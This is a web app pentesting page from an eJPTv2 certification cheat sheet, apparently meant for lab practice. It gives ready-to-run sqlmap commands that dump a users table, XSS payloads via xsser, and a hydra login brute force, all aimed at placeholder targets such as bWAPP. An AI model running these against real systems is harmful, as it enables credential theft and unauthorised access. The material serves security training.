EJPTV2 Cheat Sheet by - Yash Mehta
  • Information Gathering & Enumeration
    • Reconnaissance
      • Passive information gathering
      • Active information gathering
    • Enumeration
      • SMTP
      • MySQL Enum
        • Metasploit
        • Mysql tool,Brute force
        • Nmap
      • HTTP Enum
        • random tools
        • Nmap
        • Metasploit
      • SSH Enum
        • Nmap,Login,Hydra
        • Metasploit Modules
        • Metasploit Brute force
      • FTP Enum
        • nmap,hydra,Login
        • Metasploit
      • SMB Enum
        • smbmap
        • nmap
        • smbclient,rpcclient,enum4linux
        • metasploit,hydra
      • SMTP Enum
    • Vulnerability Scanning
      • WMAP(web application vulnerability scanner)
      • Nessus
      • Metasploit
  • Vulnerabilities in services
    • IIS WEBDAV
    • SMB/SAMBA
    • RDP
    • WinRm
    • APACHE
    • FTP
    • SSH
    • HTTP
    • SMTP
    • PHP
    • MySQL
    • Sun Glassfish
    • Workflow platform(Processmaker)
  • Exploitation
    • Windows Exploitation
      • IIS WebDav
        • msfvenom,metasploit
      • SMB
        • Brute force and Login
        • Eternal blue vulnerability
      • RDP
        • Bruteforce and Login
        • Bluekeep
      • WinRm
        • Brute force and Authentication
      • HTTP
        • HttpFileServer httpd 2.3(Rejetto)
        • BadBlue httpd 2.7
      • MySQL
      • Workflow platform(Processmaker)
      • Sun GlassFish
      • CVE-2021-44228 - Apache Log4j
      • Apache Tomcat
    • Linux Exploitation
      • Apache httpd 2.4.7-XODA Vulnerability
      • Sun Glassfish
      • Apache-Shellshock(Bash)
        • Metasploit Exploitation
      • FTP
        • Brute Force
        • ProFTPD 1.3.3c
        • vsftpd 2.3.4 - Backdoor Command Execution
      • SSH
        • Brute Force
        • libssh Authentication Bypass Scanner
      • SAMBA
        • Brute Force
        • Samba smbd 3.X - 4.X (Samba 3.5.0 -RCE)
      • SMTP
        • Brute Force
        • Haraka < 2.8.9 - Remote Command Execution
      • PHP
        • PHP < 5.3.12 / < 5.4.2 - CGI Argument Injection
      • CVE-2021-44228 - Apache Log4j
    • Payloads
      • Encoding Payloads
      • Injecting Payloads into PEs
  • Post Exploitation
    • Privilege Escalation
      • Windows Privilege Escalation
        • Win Kernel Privesc
        • UAC Bypass Akagai64.exe
        • UAC Bypass:Memory Injection
        • PrivescCheck script
        • Access Token
        • Credentials Dumping
      • Linux Privilege Escalation
        • Cron Jobs
        • SUID
        • chkrootkit 0.49
        • Misconfigured Permissions Files
        • Misconfigured SUDO Privileges
        • Credentials Dumping
    • Hash Dumping
      • Windows hash dumping
        • MimiKatz,Kiwi
        • Pass the hash
      • Linux Hash Dumping
      • Crack the Hash
        • Windows Hash cracking
        • Linux Hash Cracking
        • Metasploit
    • Pivoting
    • Transferring Files
    • Meterpreter
      • Commands
      • Shell to Meterpreter
    • Persistence
      • Windows Persistence
        • persistence_service msf module
        • Enabling RDP(msf,admin password change)
        • Enabling RDP & New user
      • Linux Persistence
        • Adding backdoor user
        • SSHkey persistence module
        • Persistence via SSH Keys
        • Cron Jobs
    • Clearing Tracks
      • Windows clearing tracks
      • Linux clearing tracks
    • Local Enumeration
      • Windows Local Enumeration
      • Linux Local Enumeration
  • Web App Pentesting
Powered by GitBook
On this page
  • Tools
  • Enumeration & Scanning
  • Attacks

Web App Pentesting

Tools

# Gobuster - Install
sudo apt update && sudo apt install -y gobuster

# Dirbuster - Install
sudo apt update && sudo apt install -y dirb

# Nikto - Install
sudo apt update && sudo apt install -y nikto

# BurpSuite - Install
sudo apt update && sudo apt install -y burpsuite

# SQLMap - Install
sudo apt update && sudo apt install -y sqlmap

# XSSer - Install
sudo apt update && sudo apt install -y xsser

# WPScan - Install
sudo apt update && sudo apt install -y wpscan

# Hydra - Install
sudo apt update && sudo apt install -y hydra

Enumeration & Scanning

nmap -sS -sV -p 80,443,3306 <TARGET_IP>

# Dirbuster
dirb http://<TARGET_IP>

# CURL
curl -I <TARGET_IP>
curl -X GET <TARGET_IP>
curl -X OPTIONS <TARGET_IP> -v
curl -X POST <TARGET_IP>
curl -X POST <TARGET_IP>/login.php -d "name=john&password=password" -v
curl -X PUT <TARGET_IP>

curl <TARGET_IP>/uploads/ --upload-file hello.txt
curl -X DELETE <TARGET_IP>/uploads/hello.txt -v

# Gobuster
gobuster dir -u http://<TARGET_IP> -w /usr/share/wordlists/dirb/common.txt -b 403,404

gobuster dir -u http://<TARGET_IP> -w /usr/share/wordlists/dirb/common.txt -b 403,404 -x .php,.xml,.txt -r

gobuster dir -u http://<TARGET_IP>/data -w /usr/share/wordlists/dirb/common.txt -b 403,404 -x .php,.xml,.txt -r

# Nikto
nikto -h http://<TARGET_IP> -o niktoscan.txt

nikto -h http://<TARGET_IP>/index.php?page=arbitrary-file-inclusion.php -Tuning 5 -o nikto.html -Format htm

Attacks

# SQLMap
sqlmap -u "http://<TARGET_IP>/sqli_1.php?title=hacking&action=search" --cookie "PHPSESSID=rmoepg39ac0savq89d1k5fu2q1; security_level=0" -p title

sqlmap -r <REQUEST_FILE> -p <POST_PARAMETER>

## List databases
sqlmap -u "http://<TARGET_IP>/sqli_1.php?title=hacking&action=search" --cookie "PHPSESSID=rmoepg39ac0savq89d1k5fu2q1; security_level=0" -p title --dbs

sqlmap -u "http://<TARGET_IP>/sqli_1.php?title=hacking&action=search" --cookie "PHPSESSID=rmoepg39ac0savq89d1k5fu2q1; security_level=0" -p title -D bWAPP --tables

sqlmap -u "http://<TARGET_IP>/sqli_1.php?title=hacking&action=search" --cookie "PHPSESSID=rmoepg39ac0savq89d1k5fu2q1; security_level=0" -p title -D bWAPP -T users --columns

sqlmap -u "http://<TARGET_IP>/sqli_1.php?title=hacking&action=search" --cookie "PHPSESSID=rmoepg39ac0savq89d1k5fu2q1; security_level=0" -p title -D bWAPP -T users -C admin,password,email --dump


# XSSer
xsser --url 'http://<TARGET_IP>/index.php?page=dns-lookup.php' -p
'target_host=XSS&dns-lookup-php-submit-button=Lookup+DNS'

xsser --url 'http://<TARGET_IP>/index.php?page=dns-lookup.php' -p
'target_host=XSS&dns-lookup-php-submit-button=Lookup+DNS' --auto

xsser --url 'http://<TARGET_IP>/index.php?page=dns-lookup.php' -p 'target_host=XSS&dns-lookup-php-submit-button=Lookup+DNS' --Fp "<script>alert(1)</script>"

xsser --url "http://<TARGET_IP>/index.php?page=user-poll.php&csrf-token=&choice=XSS&initials=2&user-poll-php-submit-button=Submit+Vote" --Fp "<script>alert(1)</script>"

## Authenticated XSSer
xsser --url "http://<TARGET_IP>/htmli_get.php?firstname=XSS&lastname=hi&form=submit" --cookie="PHPSESSID=lb3rg4q495t9sqph907sdhjgg1; security_level=0" --Fp "<script>alert(1)</script>"


# Hydra - Basic auth attacks (brute-force)
hydra -L <USERS_LIST> -P <PW_LIST> <TARGET_IP> http-post-form "/login.php:login=^USER^&password=^PASS^&security_level=0&form=submit:Invalid credentials or user not activated!"
PreviousLinux Local Enumeration

Last updated 1 year ago